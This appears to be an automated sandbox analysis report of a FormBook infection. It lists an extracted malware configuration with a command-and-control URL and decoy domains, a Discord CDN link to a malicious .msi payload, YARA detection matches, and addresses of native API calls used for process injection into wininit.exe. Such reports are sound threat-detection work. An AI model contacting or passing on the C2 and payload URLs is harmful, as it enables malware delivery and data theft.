Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp |
Malware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]} |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp |
String found in binary or memory: http://computername/printers/printername/.printer |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: explorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmp |
String found in binary or memory: http://servername/isapibackend.dll |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp |
String found in binary or memory: http://treyresearch.net |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp |
String found in binary or memory: http://wellformedweb.org/CommentAPI/ |
Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp |
String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmp |
String found in binary or memory: http://www.iis.fhg.de/audioPA |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp |
String found in binary or memory: http://www.piriform.com/ccleaner |
Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmp |
String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv |
Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: msiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi |
Source: msiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qn |
Source: msiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmp |
String found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnG |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk, |
7_2_008F00C4 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk, |
7_2_008F0048 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F0078 NtResumeThread,LdrInitializeThunk, |
7_2_008F0078 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EF9F0 NtClose,LdrInitializeThunk, |
7_2_008EF9F0 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EF900 NtReadFile,LdrInitializeThunk, |
7_2_008EF900 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, |
7_2_008EFAD0 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk, |
7_2_008EFAE8 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk, |
7_2_008EFBB8 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk, |
7_2_008EFB68 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk, |
7_2_008EFC90 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk, |
7_2_008EFC60 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFD8C NtDelayExecution,LdrInitializeThunk, |
7_2_008EFD8C |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk, |
7_2_008EFDC0 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk, |
7_2_008EFEA0 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, |
7_2_008EFED0 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFFB4 NtCreateSection,LdrInitializeThunk, |
7_2_008EFFB4 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F10D0 NtOpenProcessToken, |
7_2_008F10D0 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F0060 NtQuerySection, |
7_2_008F0060 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F01D4 NtSetValueKey, |
7_2_008F01D4 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F010C NtOpenDirectoryObject, |
7_2_008F010C |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F1148 NtOpenThread, |
7_2_008F1148 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F07AC NtCreateMutant, |
7_2_008F07AC |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EF8CC NtWaitForSingleObject, |
7_2_008EF8CC |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EF938 NtWriteFile, |
7_2_008EF938 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F1930 NtSetContextThread, |
7_2_008F1930 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFAB8 NtQueryValueKey, |
7_2_008EFAB8 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFA20 NtQueryInformationFile, |
7_2_008EFA20 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFA50 NtEnumerateValueKey, |
7_2_008EFA50 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFBE8 NtQueryVirtualMemory, |
7_2_008EFBE8 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFB50 NtCreateKey, |
7_2_008EFB50 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFC30 NtOpenProcess, |
7_2_008EFC30 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFC48 NtSetInformationFile, |
7_2_008EFC48 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F0C40 NtGetContextThread, |
7_2_008F0C40 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008F1D80 NtSuspendThread, |
7_2_008F1D80 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFD5C NtEnumerateKey, |
7_2_008EFD5C |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFE24 NtWriteVirtualMemory, |
7_2_008EFE24 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFFFC NtCreateProcessEx, |
7_2_008EFFFC |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008EFF34 NtQueueApcThread, |
7_2_008EFF34 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F00C4 NtCreateFile,LdrInitializeThunk, |
9_2_021F00C4 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F07AC NtCreateMutant,LdrInitializeThunk, |
9_2_021F07AC |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFAB8 NtQueryValueKey,LdrInitializeThunk, |
9_2_021EFAB8 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, |
9_2_021EFAD0 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk, |
9_2_021EFAE8 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFB50 NtCreateKey,LdrInitializeThunk, |
9_2_021EFB50 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk, |
9_2_021EFB68 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk, |
9_2_021EFBB8 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EF900 NtReadFile,LdrInitializeThunk, |
9_2_021EF900 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EF9F0 NtClose,LdrInitializeThunk, |
9_2_021EF9F0 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, |
9_2_021EFED0 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFFB4 NtCreateSection,LdrInitializeThunk, |
9_2_021EFFB4 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk, |
9_2_021EFC60 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFD8C NtDelayExecution,LdrInitializeThunk, |
9_2_021EFD8C |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk, |
9_2_021EFDC0 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F0048 NtProtectVirtualMemory, |
9_2_021F0048 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F0078 NtResumeThread, |
9_2_021F0078 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F0060 NtQuerySection, |
9_2_021F0060 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F10D0 NtOpenProcessToken, |
9_2_021F10D0 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F010C NtOpenDirectoryObject, |
9_2_021F010C |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F1148 NtOpenThread, |
9_2_021F1148 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F01D4 NtSetValueKey, |
9_2_021F01D4 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFA20 NtQueryInformationFile, |
9_2_021EFA20 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFA50 NtEnumerateValueKey, |
9_2_021EFA50 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFBE8 NtQueryVirtualMemory, |
9_2_021EFBE8 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EF8CC NtWaitForSingleObject, |
9_2_021EF8CC |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EF938 NtWriteFile, |
9_2_021EF938 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F1930 NtSetContextThread, |
9_2_021F1930 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFE24 NtWriteVirtualMemory, |
9_2_021EFE24 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFEA0 NtReadVirtualMemory, |
9_2_021EFEA0 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFF34 NtQueueApcThread, |
9_2_021EFF34 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFFFC NtCreateProcessEx, |
9_2_021EFFFC |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFC30 NtOpenProcess, |
9_2_021EFC30 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFC48 NtSetInformationFile, |
9_2_021EFC48 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F0C40 NtGetContextThread, |
9_2_021F0C40 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFC90 NtUnmapViewOfSection, |
9_2_021EFC90 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021EFD5C NtEnumerateKey, |
9_2_021EFD5C |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021F1D80 NtSuspendThread, |
9_2_021F1D80 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00099D50 NtCreateFile, |
9_2_00099D50 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00099E00 NtReadFile, |
9_2_00099E00 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00099E80 NtClose, |
9_2_00099E80 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00099F30 NtAllocateVirtualMemory, |
9_2_00099F30 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00099DFB NtReadFile, |
9_2_00099DFB |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00099F2B NtAllocateVirtualMemory, |
9_2_00099F2B |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, |
9_2_024E93CE |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, |
9_2_024E9862 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, |
9_2_024E93D2 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E9DAE NtResumeThread,NtClose, |
9_2_024E9DAE |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008FE0C6 |
7_2_008FE0C6 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0092D005 |
7_2_0092D005 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0091905A |
7_2_0091905A |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00903040 |
7_2_00903040 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008FE2E9 |
7_2_008FE2E9 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009A1238 |
7_2_009A1238 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008FF3CF |
7_2_008FF3CF |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009263DB |
7_2_009263DB |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00902305 |
7_2_00902305 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00907353 |
7_2_00907353 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0094A37B |
7_2_0094A37B |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00935485 |
7_2_00935485 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00911489 |
7_2_00911489 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0093D47D |
7_2_0093D47D |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0091C5F0 |
7_2_0091C5F0 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0090351F |
7_2_0090351F |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00904680 |
7_2_00904680 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0090E6C1 |
7_2_0090E6C1 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009A2622 |
7_2_009A2622 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0098579A |
7_2_0098579A |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0090C7BC |
7_2_0090C7BC |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009357C3 |
7_2_009357C3 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0099F8EE |
7_2_0099F8EE |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0090C85C |
7_2_0090C85C |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0092286D |
7_2_0092286D |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009A098E |
7_2_009A098E |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009029B2 |
7_2_009029B2 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009169FE |
7_2_009169FE |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00985955 |
7_2_00985955 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009B3A83 |
7_2_009B3A83 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_009ACBA4 |
7_2_009ACBA4 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0098DBDA |
7_2_0098DBDA |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_008FFBD7 |
7_2_008FFBD7 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00927B00 |
7_2_00927B00 |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0099FDDD |
7_2_0099FDDD |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00930D3B |
7_2_00930D3B |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0090CD5B |
7_2_0090CD5B |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00932E2F |
7_2_00932E2F |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0091EE4C |
7_2_0091EE4C |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_00910F3F |
7_2_00910F3F |
Source: C:\Windows\Installer\MSID8B1.tmp |
Code function: 7_2_0092DF7C |
7_2_0092DF7C |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022A1238 |
9_2_022A1238 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021FE2E9 |
9_2_021FE2E9 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02202305 |
9_2_02202305 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0224A37B |
9_2_0224A37B |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02207353 |
9_2_02207353 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022A63BF |
9_2_022A63BF |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021FF3CF |
9_2_021FF3CF |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022263DB |
9_2_022263DB |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0222D005 |
9_2_0222D005 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02203040 |
9_2_02203040 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0221905A |
9_2_0221905A |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021FE0C6 |
9_2_021FE0C6 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022A2622 |
9_2_022A2622 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0224A634 |
9_2_0224A634 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02204680 |
9_2_02204680 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0220E6C1 |
9_2_0220E6C1 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0220C7BC |
9_2_0220C7BC |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0228579A |
9_2_0228579A |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022357C3 |
9_2_022357C3 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0223D47D |
9_2_0223D47D |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02235485 |
9_2_02235485 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02211489 |
9_2_02211489 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0220351F |
9_2_0220351F |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02246540 |
9_2_02246540 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0221C5F0 |
9_2_0221C5F0 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022B3A83 |
9_2_022B3A83 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02227B00 |
9_2_02227B00 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022ACBA4 |
9_2_022ACBA4 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_021FFBD7 |
9_2_021FFBD7 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0228DBDA |
9_2_0228DBDA |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0222286D |
9_2_0222286D |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0220C85C |
9_2_0220C85C |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0229F8EE |
9_2_0229F8EE |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02285955 |
9_2_02285955 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022029B2 |
9_2_022029B2 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022A098E |
9_2_022A098E |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_022169FE |
9_2_022169FE |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02232E2F |
